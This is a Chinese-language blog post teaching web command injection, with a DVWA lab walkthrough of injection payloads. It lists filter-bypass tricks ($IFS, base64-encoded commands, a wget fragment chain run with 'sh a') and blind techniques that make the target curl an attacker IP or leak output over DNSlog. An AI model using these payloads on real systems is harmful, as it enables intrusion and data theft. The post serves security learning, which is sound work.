web安全之命令注入

最新推荐文章于 2024-04-17 13:34:51 发布
最新推荐文章于 2024-04-17 13:34:51 发布
阅读量698 收藏 4
点赞数 1
文章标签: web安全 php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54584489/article/details/130127546
版权

简介:

命令注入漏洞即web应用程序使用了可以操控相关系统命令的功能,又没有对用户输入进行过滤,导致攻击者可以通过拼接输入而执行系统命令。

危害:

执行系统命令,修改主机配置,如防火墙、注册表,获取主机敏感文件信息以及开启的端口服务(可能需要一定权限,若web的权限是root,则畅通无阻),为后面进一步入侵打好基础。

易造成漏洞的相关函数:

Php:

System() : 用于执行外部程序并显示输出

Exec() : 用于执行一个外部程序

Shell_exec() : 通过shell环境执行命令,并且将完整的输出以字符串的方式返回

Passthru() : 用于执行外部程序并显示原始输出

Popen() : 用于打开进程文件指针

Proc_open : 执行一个命令,并且打开一个out/in的文件指针

(反引号`:  `cmd` 是PHP执行运算符,PHP将尝试将返单引号中的内容作为shell命令来执行,并将其输出信息返回)

Python:

System() : 将命令和参数传递给系统的shell并执行

Popen() : 用于执行外部程序并获取其输出

Subprocess.call() : 调用Windows的cmd执行额外命令

Spwan() : 执行一个程序并返回该程序的操作句柄

Java:

    Java.lang.Runtime.getRuntime().exec(commad) : 执行指定字符串commad命令

利用方式:

利用主要是利用管道符及其它连接符进行拼接命令:

Windows:

x&y   x可真可假,若x为假则执行y

x&&y  x为真才执行y

x|y    直接执行y

x||y   x为假才执行y

Linux:

X;y    执行完x后执行y

x&y   x可真可假,若x为假则执行y

x&&y  x为真才执行y

x|y    直接执行y

x||y   x为假才执行y

实践与练习:

环境:dvwa

Low:

直接输入命令:1 | dir 爆出目录

Medium

重复上述操作(仍然爆出来了,这个中级令人不太理解)

 查看源码,看其做了啥

 很明显,中级关卡就搞了个黑名单,对&& 和 ; 进行了处理,但我用的 | 没有在其中。那就用 1 && dir命令来演示一下错误示范吧

High

继续执行我们上面用的命令 1 | dir

终于有点等级变换了,这里 | 不再起作用,显然是做了处理,可能加入了黑名单,也可能进行了转换,这里先不管它,毕竟 | 只是我们的手段之一。

继续测试 0 & dir 、 1 && dir 都不行

 

 执行 1 || dir成功爆出

 查看源码分析,发现仍然是黑名单,但范围大了很大

这里有个疑惑,就我们用到的 || 明明已经在黑名单里面,为啥dir仍然能被执行?

仔细观察分析不难发现,程序应该是将命令1 || dir 的前一个|给替换成了空格,而保留了后一个| ,那么我们侥幸得到的脚本就应该改为 1 |dir (| 前面有一个空格)

绕过方法:

在我们实际攻击时往往会需要执行一些复杂的命令,而不是简简单单的一个类似于dir的命令,而这也为防御提供了诸多选择,例如我们常常需要的命令参数链接符”-”或空格,将其加入黑名单,则可以阻断很多非法命令。

(1)空格绕过:

使用$[IFS](其为linux内部区域分隔符,可以为空格、制表符,换行符或其他自定义符号)替换空格;

使用url编码进行替换,制表符的url编码为%09,其效果与空格是一样的;

使用{}符号,{netstat, -ano}与netstat -ano等效

使用<符号(输入重定向,后面跟的文件将取代键盘输入),即cat txt与cat<txt等价

(2)黑名单绕过:

字符拼接,a=l;b=s; $a$b(linux);

/字符绕过,c/a/t 与cat等价;

Base64编码绕过,echo “bHM=” | base64 -d ,即先将ls命令进行编码为 bHM= ,而后用base -d 解密;

(3)长度限制绕过:

如不断执行命令 >wget\  >foo.\  >com  ls -t>a  sh a 会按时间顺序把命令写入文件,最后执行文件

无回显技巧:

当我们发出精心构造的系统命令时,却没有回显,也就不知道命令是否执行,拿不到我们想要的信息。这时候就需要一些技巧来协助我们。

  1. sleep()函数的使用,通过使用sleep函数来判断命令是否执行。若有延时,则命令执行了,若无延时则命令没有执行。
  2. http请求,构造命令使得靶机执行 “curl 目标ip:端口”,而我们只需打开监听即可。
  3. Dns请求,若请求的目标是域名,则肯定会进行一次解析请求,我们只需要将域名指向自己的dns server,则可收到来自靶机的解析请求,从而判断命令是否执行。
  4. Dnslog带外技术:将命令拼接到dns域名上进行请求,而通过dnslog查看结果(常见的dnslog平台:DNSLog Platform  http://admin.dnslog.link  CEYE - Monitor service for security testing )

防御措施:

  1. 黑名单
  2. 输入过滤
  3. 不使用时禁用相应函数
  4. 尽量不要执行外部的应用程序或命令

 

krbtgt_@
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Web 应用渗透测试 01 - 命令注入(Code Injection)之 create_function
0pr
02-04 1074
这篇文章将讨论 PHP Web 应用中 **create_function** 的命令注入命令注入,究其根源,都是未对用户提供的输入做合理过滤造成的。当然,编程语言本身内置的危险方法的使用,是命令注入频发的另一原因。
WEB安全基础入门—操作系统命令注入(shell 注入
Eason_LYC安全白帽子的成长博客
06-09 1919
WEB安全基础入门—操作系统命令注入(shell注入) 欢迎关注订阅专栏! WEB安全系列包括如下三个专栏: 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 欢迎关注订阅专栏!......
常见的Web漏洞——命令注入
热门推荐
江左盟的博客
09-29 1万+
目录 命令注入简介 命令注入原理 漏洞利用 漏洞防范 总结 命令注入简介 命令注入漏洞和SQL注入、XSS漏洞很相似,也是由于开发人员考虑不周造成的,在使用web应用程序执行系统命令的时候对用户输入的字符未进行过滤或过滤不严格导致的,常发生在具有执行系统命令web应用中,如内容管理系统(CMS)等。 命令注入原理 本文以DVWA中的Command Injection为例,查看...
web应用常见的攻击方式及解决办法
努力学习的狐狸的博客
06-13 968
例如,攻击者可以在一个钓鱼网站中放置恶意链接,当用户点击该链接时,会跳转到 Web 应用程序中的某个页面,并自动执行恶意请求,而用户并不知情。包含本地文件:攻击者利用应用程序中的文件包含函数(如 PHP 的 include()、require() 函数等),来加载本地文件,例如配置文件、日志文件等,然后将恶意代码注入到这些文件中。包含远程文件:攻击者利用应用程序中的文件包含函数,来加载远程文件,例如攻击者自己搭建的 Web 服务器上的文件,然后将恶意代码注入到这些文件中。
渗透测试-命令执行注入
lza20001103的博客
07-20 2771
渗透测试-命令执行注入
Web安全之SQL注入
01-21
SQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点...
WEB安全-注入漏洞
10-11
WEB安全-注入漏洞,很好的学习PPT SQL注入是一种Web应用代码中的漏洞。 黑客可以构造特殊请求,使Web应用执行带有附加条件的SQL语句 用户请求中带有参数的值,没有进行任何过滤 用户请求中带有参数的值,没有进行...
命令注入讲解ppt.pptx
08-10
最常见的命令注入攻击形式是 SQL 命令注入攻击(简称 SQL 注入),是指恶意黑客利用设计上的安全漏洞,把 SQL 代码粘贴在网页形式的输入框内,进而改变服务端数据。 PHP 应用程序中也有名为 PHP 命令注入攻击的漏洞...
web安全防护命令执行课件PPT
11-21
web安全防护命令执行课件PPT,命令执行和命令注入的区别,命令注入的原理,命令注入的DWA实验操作。以及命令执行的总结。
Web安全——命令注入漏洞详解
Boom!脑洞大爆炸的博客
06-09 1万+
手把手入门命令注入漏洞
渗透测试——七、网站漏洞——命令注入和跨站请求伪造(CSRF)
钟言的博客
12-07 9451
本篇为渗透测试的第七篇,网络漏洞之命令注入和跨站请求伪造(CSRF),详细内容包含了命令注入 跨站请求伪造(CSRF)命令注入页面之注人测试四、CSRF页面之请求伪造测试等等
1-Web安全——命令执行注入攻击
网络安全
09-06 7203
1. 系统命令执行 通常在程序开发过程中,应用程序需要调用一些外部程序时会用到一些系统命令相关函数。 例如在linux系统中,shell解释器就是用户和系统进行交互的一个接口,对用户的输入进行解析并在系统中执行。而shell脚本语言就是linux系统由各种shell命令组成的程序,具有其他普通编程的很多特点。 2. Web命令执行 常用的ASP,PHP,JSP等web脚本解释语言支持动态执行在运行时生成的代码这种特点,可以帮助开发者根据各种数据和条件动态修改程序代码,这对于开发人员来说是有利的.
WEB安全基础入门—操作系统命令注入(shell 注入)_文件参数 shell 命令注入
最新发布
2401_84150320的博客
04-17 888
命令执行成功,命令执行结果将会写入路径下的whoami.txt文件中。在问题反馈功能处存在盲注命令执行漏洞,利用Burp Collaborator执行。这个命令就算存在的命令注入漏洞,但是在用户web端不会有任何回显。注意:命令注入要注意是否有引号等包裹,注意闭合后溢出,命令才能执行。系统若存在漏洞,将会发起10次ping命令,导致响应时间延迟。发现漏洞后,应执行一些基础命令,查看相关系统信息。在问题反馈功能处存在盲注命令执行漏洞,执行。在问题反馈功能处存在盲注命令执行漏洞,执行。
Wget漏洞(CVE-2016-4971)利用方式解析
qq_40907977的博客
05-15 1444
漏洞描述 近日, CVE-2016-4971漏洞被正式披露,该漏洞影响全部旧版本wget, 黑客可以利用此漏洞对程序员和运维工程师进行钓鱼,从而获得其主机权限或者植入rootkit。 漏洞详情 wget 作为*nix 系统常用下载工具,支持http、https、ftp 等多种协议,当使用wget 下载文件时,若初始下载http服务提供的下载资源, 如果服务器将下载资源重定向到ftp服务时,wget 会默认信赖http服务器重定向的ftp 链接地址和文件名,而不做二次验证。从而可能下载到恶意钓鱼者的恶意文件,
Web安全测试常见漏洞-SQL注入命令注入
m0_57098592的博客
09-02 1636
Web安全测试常见漏洞-SQL注入命令注入
命令注入绕过技巧总结
weixin_41082546的博客
05-05 3435
命令注入绕过技巧总结 命令注入是一个安全漏洞,它使攻击者可以在易受攻击的应用程序中执行任意命令。 基本命令 root@micr067:~# cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin...
命令注入绕过方式总结
cainsoftware的博客
10-09 1674
前言 命令注入web中常见的漏洞之一,由于web应用程序未对用户提交的数据做严格的过滤,导致用户输入可以直接被linux或windows系统当成命令执行,一般都会造成严重的危害。 常用符号 分号(;) 多条语句顺序执行时的分割符号。 cmd1;cmd2 管道符(|) cmd1命令的输出,作为下一条命令cmd2的参数。 cmd1|cmd2 and(&&) 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cmd1 && cmd2
关于那些Web漏洞--命令注入
shawdow_bug的博客
06-16 434
命令注入漏洞原理

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值